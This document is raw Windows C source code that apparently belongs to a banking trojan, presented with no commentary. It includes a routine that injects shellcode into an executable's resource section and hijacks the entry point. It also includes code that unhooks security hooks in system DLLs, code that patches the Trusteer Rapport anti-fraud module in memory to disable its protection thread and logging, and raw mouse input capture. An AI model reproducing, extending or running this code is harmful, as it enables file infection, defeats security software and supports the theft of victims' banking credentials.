VOID UnhookLibs() { UnhookModuleExports(MyGetModuleBase("ntdll")); UnhookModuleExports(MyGetModuleBase("kernel32")); UnhookModuleExports(MyGetModuleBase("mswsock")); UnhookModuleExports(MyGetModuleBase("ws2_32")); UnhookModuleExports(MyGetModuleBase("wsock32")); UnhookModuleExports(MyGetModuleBase("wininet")); if (!pGetModuleHandleA("ieframe.dll")) { UnhookModuleExports(MyGetModuleBase("user32.dll")); } UnhookModuleExports(MyGetModuleBase("gdi32.dll")); }
static void cleanup_window(void) { if (raw_hwnd) { MSG Msg; pDestroyWindow(raw_hwnd); while (pPeekMessageA(&Msg, raw_hwnd, 0, 0, PM_REMOVE)) { pTranslateMessage(&Msg); pDispatchMessageA(&Msg); } /* while */ raw_hwnd = 0; } /* if */ if (class_atom) { pUnregisterClassA(class_name, pGetModuleHandleA(NULL)); class_atom = 0; } /* if */ } /* cleanup_window */
static int init_event_queue(void) { HINSTANCE hInstance = pGetModuleHandleA(NULL); WNDCLASSEX wce; RAWINPUTDEVICE rid; ZeroMemory(input_events, sizeof (input_events)); input_events_read = input_events_write = 0; ZeroMemory(&wce, sizeof (wce)); wce.cbSize = sizeof(WNDCLASSEX); wce.lpfnWndProc = RawWndProc; wce.lpszClassName = class_name; wce.hInstance = hInstance; class_atom = pRegisterClassExA(&wce); if (class_atom == 0) return 0; raw_hwnd = pCreateWindowExA(0, class_name, win_name, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, HWND_MESSAGE, NULL, hInstance, NULL); if (raw_hwnd == NULL) return 0; pInitializeCriticalSection(&mutex); ZeroMemory(&rid, sizeof (rid)); rid.usUsagePage = 1; /* GenericDesktop page */ rid.usUsage = 2; /* GeneralDestop Mouse usage. */ rid.dwFlags = RIDEV_INPUTSINK; rid.hwndTarget = raw_hwnd; if (!pRegisterRawInputDevices(&rid, 1, sizeof (rid))) { pDeleteCriticalSection(&mutex); return 0; } /* if */ return 1; } /* init_event_queue */
static bool InfectImage( PVOID data, DWORD dataSize, char *dllPath, char *commandLine ) { DWORD shellcodeSize = (DWORD)((PUCHAR)&Shellcode_end - (PUCHAR)&Shellcode); DWORD totalSize = shellcodeSize + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1; DBG( "Shellcode size is %d bytes", totalSize); PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS) ((PUCHAR)data + ((PIMAGE_DOS_HEADER)data)->e_lfanew); PIMAGE_SECTION_HEADER section = (PIMAGE_SECTION_HEADER) (headers->FileHeader.SizeOfOptionalHeader + (PUCHAR)&headers->OptionalHeader); DWORD numberOfSections = headers->FileHeader.NumberOfSections; // enumerate sections for( int i = 0; i < (int)numberOfSections; i++ ) { // check for resources section if( !m_memcmp( (char*)§ion->Name, ".rsrc", 5) ) { if( section->SizeOfRawData < totalSize ) { DBG( "ERROR: Not enough free space in '.rsrc'" ); return false; } // fill shellcode parameters PSHELLCODE_PARAMS params = (PSHELLCODE_PARAMS)((PUCHAR)data + section->PointerToRawData); m_memset( params, 0, sizeof(SHELLCODE_PARAMS) ); params->dwAddressofEntryPoint = headers->OptionalHeader.AddressOfEntryPoint; HMODULE kernel32 = (HMODULE)pGetModuleHandleA("kernel32.dll"); params->f_LoadLibraryA = (func_LoadLibraryA)pGetProcAddress( kernel32, "LoadLibraryA" ); params->f_WinExec = (func_WinExec)pGetProcAddress( kernel32, "WinExec" ); if( commandLine ) m_lstrcpy( params->szCommandLine, commandLine ); m_lstrcpy( params->szDllPath, dllPath ); // copy shellcode PVOID shellcode = (PVOID)((PUCHAR)params + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1); m_memcpy( shellcode, Shellcode, shellcodeSize); // replace address of entry point headers->OptionalHeader.AddressOfEntryPoint = section->VirtualAddress + sizeof(SHELLCODE_PARAMS) + m_lstrlen(dllPath) + 1; // make section executable section->Characteristics |= IMAGE_SCN_MEM_EXECUTE; headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].VirtualAddress = NULL; headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].Size = 0; DWORD headerSum = 0, checkSum = 0; // recalculate checksum if( pCheckSumMappedFile( data, dataSize, &headerSum, &checkSum ) ) headers->OptionalHeader.CheckSum = checkSum; else DBG( "CheckSumMappedFile() ERROR %d", pGetLastError() ); DBG( "OK" ); break; } section++; } return true; }
HMODULE MyGetModuleBase(LPCSTR lpDll) { HMODULE hDll = (HMODULE)pGetModuleHandleA(lpDll); return hDll ? hDll : (HMODULE)pLoadLibraryA(lpDll); }
BOOL AntiRapport() { BOOL bRet = FALSE; UCHAR Buf; DWORD t; HMODULE hRapportModule; LPCSTR lpStr1; LPCSTR lpStr2; DWORD dwStr1; DWORD dwStr2; PVOID pvLogFix; PVOID pvFix; pLoadLibraryA("wininet.dll"); pLoadLibraryA("user32.dll"); hRapportModule =(HMODULE) pGetModuleHandleA("RapportUtil.dll"); if (hRapportModule) { lpStr1 = "periodic_checkpoint::periodic_checkpoint_thread"; lpStr2 = ".\\patching_sentry\\periodic_checkpoint.cpp"; dwStr1 = AntiRapportFindStr(hRapportModule,lpStr1,(DWORD)plstrlenA(lpStr1)); if (dwStr1) { dwStr2 = AntiRapportFindStr(hRapportModule,lpStr2,(DWORD)plstrlenA(lpStr2)); if (dwStr2) { pvFix = AnitRapportFindPushStrs(hRapportModule,dwStr1,dwStr2,&pvLogFix); if (pvFix) { Buf = 0x19; if (pWriteProcessMemory(pGetCurrentProcess(),pvFix,(PVOID)&Buf,sizeof(Buf),&t)) { bRet = TRUE; // DbgPrint(__FUNCTION__"(): rapport protect thread patched at %x\n",pvFix); } else { //DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError()); } if (pvLogFix) { Buf = 0xC3; if (pWriteProcessMemory(NtCurrentProcess(),pvLogFix,(PVOID)&Buf,sizeof(Buf),&t)) { // DbgPrint(__FUNCTION__"(): rapport log proc patched at %x\n",pvLogFix); } else { // DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError()); } } pSleep(4000); UnhookLibs(); } } } } return bRet; }